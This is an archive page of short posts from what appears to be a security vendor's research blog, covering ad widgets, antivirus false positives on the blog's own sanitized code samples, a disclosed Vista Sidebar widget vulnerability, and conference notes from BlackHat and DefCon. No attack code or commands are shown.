Category Archives: Finjan

Widgets+Advertisements=?

Posted on by
1

Coincidence or just sheer luck, but I just happened to stumble upon this article announcing that Google has come up with a widget that serves advertisements, and quoting the source: “A variety of web technologies can be used to create the ad, including Flash and HTML to author it, and RSS, images, video, and audio among other media times to provide the content”.

As we have been covering these two “problematic” areas from the security standpoint (Advertisements as a vector for distributing malicious code, and the insecurity of widgets and gadgets), I truly hope that this new mashup (Web2.0 or not) will hold its own in terms of security. In any case like anything Google this should be cool.

Hitting the nail on the head

Posted on by
1

When we here at the MCRC are publishing our quarterly trends reports (http://www.finjan.com/Content.aspx?id=827), we are always facing the possibility that what we have been working on and predicting that would become the next issue with web security, isn’t really going to happen.

Fortunately, we keep getting great feedback from the community since we started the publication, and were able to correctly predict and analyze way in advance every major trend in the field. From dynamic code obfuscation, advertising as an attack vector, affiliation networks for distributing code, crimeware toolkits, evasive techniques in malicious code writing, and the latest crimeware Trojans, and widgets and gadget insecurity.

We were always able to step back and see how what we have been analyzing in the last couple of months is becoming the new pet-peeve of the web security community and its surrounding media coverage. So once again, thank you Symantec, IBM and everyone else who have acknowledged our latest research, and we’ll be looking forward to the next quarter…

The perils of running a security blog

Posted on by
Reply

This is a bit off-the-beaten-path of this blog’s usual in-depth hardcore security posts. I was going through some of the support related emails that have some relevance to the areas I’m responsible for, and found a pretty interesting correspondence between an avid blog reader (for privacy I’m not going to mention his/her name), and one of our support personnel. The thing that caught my attention was a very alarming subject line – “What are you trying to do – infect me with a Trojan?”.

Obviously, with an opening such as that, I immediately went on to read the entire thread, and it seems that our blog posts are being flagged by some anti-viruses as malicious!!!

Knowing first-hand that we don’t have any malicious code on our blog (I personally approve every post, and when needed “censor” the code in order to make sure that script kiddies won’t have a too-easy job), I tested some of the posts against virustotal.com for reference (not as a benchmark of course, out of curiosity) – as provided by VirusTotal – you can see below the 3 offending engines that marked us as malicious.

perils001

Now for the nitty-gritty details:

  1. The code we post on the blog is in a presentational context, without any accompanying scripts that may turn it into active scripting code. It just can’t run…
  2. The code is always sanitized. The malicious parts are being cut in a way that makes them unusable for any malicious purposes. Sometimes though, the surrounding code is left intact. This surrounding code may happen to be a de-obfuscation function, an AJAX request code, etc… This code is not malicious in any shape or form, and is used extensively on the web for perfectly benign purposes. In the screenshot below note all the areas that were “sanitized” by us…

perils002

Conclusions: Using signature based security measures may have been OK a few years ago (like 6 or 7), but when modern malicious code is a little bit more sophisticated these days, a much better solution is required that can actually “understand” what the code really tries to do and make a decision based on that rather than on how the code looks (sounds a little like good-ol’e prejudice… move on with the times – this is the modern era where you can’t judge a person on his looks/gender/race/etc…)

Now I want someone to tell me that this is not a false positive…

Really – be safe out there!

Vista Sidebar Vulnerability

Posted on by
Reply

Or how a contact may get too close for comfort… It’s finally here. August 14th, and we are finally in liberty to talk about the vulnerability in the Vista Sidebar Contacts Widget.

As you may or may not know – when we presented “The Inherent Insecurity of Widgets and Gadgets” a few days ago at DefCon, we were unable to show a Vista vulnerable widget (5 out of 6 demos is pretty good though…), and presented a “censored” video as a teaser. The reason was that the security bulletin from Microsoft was only scheduled for the 14th (after several delays starting from an initial update scheduled for April…).

Interestingly enough – the severity as noted in the MS Security Bulletin is only “Important” rather than the critical that remote code execution usually means (maybe because the fix is just a one-liner???).

Either way – it out there, and we are proud to be helpful to the security community by providing alerts so that vendors can fix problems that affect the security on the internet. You can see the full uncensored video that shows how simple it is to get full remote code execution with these things below.

Post BlackHat, pre DefCon

Posted on by
Reply

So it’s been a really hectic couple of days here in Vegas. We are here (myself and 2 members of MCRC – Aviv & Amir), running between presentations, and handling booth/media traffic.

The really interesting trend here is the amount of research that touched web security (in the sense that we at Finjan are focused on). From Kaminsky who talked about the browser being the attack vector to get to the core of the intranet, through the research from SPI (kudos Billy), CaffeineMonkey from the guys at SecureWorks, and so on and so forth (sorry if I left out anyone – I’m still working on 3 differemt time zones and keeping up with the “schedule” here…).

This means so much for us and really gives us a huge boost in terms of putting more research effort and working with our colleagues from other vendors.

In this optimistic tone, we are now facing DefCon – be sure to catch our presentation on Sunday – this stuff is really hot…